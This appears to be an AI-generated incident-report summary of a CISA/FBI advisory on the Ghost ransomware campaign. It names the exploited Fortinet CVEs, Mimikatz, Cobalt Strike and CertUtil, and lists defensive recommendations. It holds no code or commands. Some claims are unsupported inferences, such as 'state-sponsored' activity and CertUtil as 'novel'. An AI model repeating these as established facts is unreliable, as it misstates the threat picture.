Full Report
CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations. [...]
Analysis Summary
# Incident Report: Global Ghost Ransomware Campaign
## Executive Summary
CISA and the FBI issued a joint advisory concerning a widespread campaign utilizing the Ghost ransomware variant, which has successfully breached organizations across approximately 70 countries since its first detection in early 2021. The attackers primarily leveraged unpatched Fortinet FortiOS SSL VPN vulnerabilities to gain initial access, followed by deploying sophisticated post-exploitation tools like Mimikatz and Cobalt Strike before deploying the ransomware payload. Response recommendations heavily focus on immediate patching of known vulnerabilities, network segmentation, and implementing phishing-resistant MFA.
## Incident Details
- **Discovery Date:** Advisory issued in early 2025 (based on recent FBI investigations mentioning January 2025 activity).
- **Incident Date:** First spotted in early 2021, with continued activity referenced up to January 2025.
- **Affected Organization:** Organizations across 70 countries globally.
- **Sector:** Not explicitly limited; impacted targets include election support systems and various enterprises.
- **Geography:** Global (70 countries).
## Timeline of Events
### Initial Access
- **Date/Time:** Beginning in early 2021 (and ongoing into early 2025).
- **Vector:** Exploitation of unpatched **Fortinet SSL VPN appliances**, specifically targeting **CVE-2018-13379**. Other vulnerabilities mentioned include CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.
- **Details:** Attackers scanned for and exploited vulnerable Fortinet FortiOS servers exposed to the internet.
### Lateral Movement
- **Date/Time:** Following initial access.
- **Details:** Attackers deployed custom **Mimikatz** samples for credential access and **CobaltStrike beacons** to maintain persistence and facilitate command and control.
### Data Exfiltration/Impact
- **Date/Time:** Prior to payload deployment.
- **Details:** The final impact involved the deployment of the **Ghost ransomware payload**. The full scope of data exfiltration is not detailed, but credential theft suggests data theft was likely executed.
### Detection & Response
- **Detection:** Detected through FBI investigations leading up to a joint advisory issued by CISA, FBI, and MS-ISAC.
- **Response Actions:** Authorities released tactical indicators, TTPs, and detection methods to aid organizations in identifying and mitigating compromise.
## Attack Methodology
- **Initial Access:** Exploitation of **CVE-2018-13379** in Fortinet SSL VPN appliances.
- **Persistence:** Deployment of **CobaltStrike beacons**.
- **Privilege Escalation:** Implied via credential access tools.
- **Defense Evasion:** Use of legitimate Windows tools like **CertUtil** for deploying payloads to bypass security software.
- **Credential Access:** Use of custom **Mimikatz** samples.
- **Discovery:** Standard reconnaissance likely occurred post-access to map the environment.
- **Lateral Movement:** Facilitated by CobaltStrike beacons after gaining credentials.
- **Collection:** Implied by the use of credential access tools prior to encryption.
- **Exfiltration:** Not explicitly detailed, but likely high-value data targeted before encryption.
- **Impact:** Encryption of systems via **Ghost ransomware**.
## Impact Assessment
- **Financial:** Not specified, but potentially significant due to widespread global targeting.
- **Data Breach:** Implied due to the use of credential harvesting tools (Mimikatz).
- **Operational:** Significant system downtime due to ransomware deployment.
- **Reputational:** High given breaches across 70 countries.
## Indicators of Compromise
*Note: Specific IOCs (URLs/IPs) were not provided in the source text for defanging, only CVEs and tool names.*
- **Network indicators:** (Not provided in source)
- **File indicators:** Custom Mimikatz samples, CobaltStrike payloads.
- **Behavioral indicators:** Use of **Windows CertUtil** utility for payload execution.
## Response Actions
*Based on the lessons learned and recommendations issued in the advisory:*
- **Containment:** (Implied) Isolate affected systems; block C2 traffic associated with CobaltStrike.
- **Eradication:** (Step 3) Patch all actively exploited CVEs immediately (especially CVE-2018-13379).
- **Recovery:** Restore from **air-gapped and off-site system backups** that cannot be encrypted by ransomware.
## Lessons Learned
- Significant risk associated with long-standing, publicly disclosed vulnerabilities in perimeter devices (e.g., Fortinet SSL VPNs).
- Attackers frequently combine established TTPs (Mimikatz, CobaltStrike) with novel evasion techniques (CertUtil use).
- State-sponsored activity has successfully leveraged common enterprise vulnerabilities (like CVE-2018-13379) to deploy ransomware operators.
## Recommendations
1. **Patch Management:** Promptly patch operating systems, software, and firmware, focusing immediately on vulnerabilities targeted by Ghost ransomware (CVE-2018-13379, etc.).
2. **Segmentation:** Implement network segmentation to severely limit an attacker's ability to move laterally from an initially compromised device.
3. **MFA:** Enforce phishing-resistant Multi-Factor Authentication (MFA) for all privileged accounts and email service accounts.
4. **Backup Strategy:** Maintain secured, **air-gapped, and immutable off-site backups** to ensure clean restoration capability pre-encryption.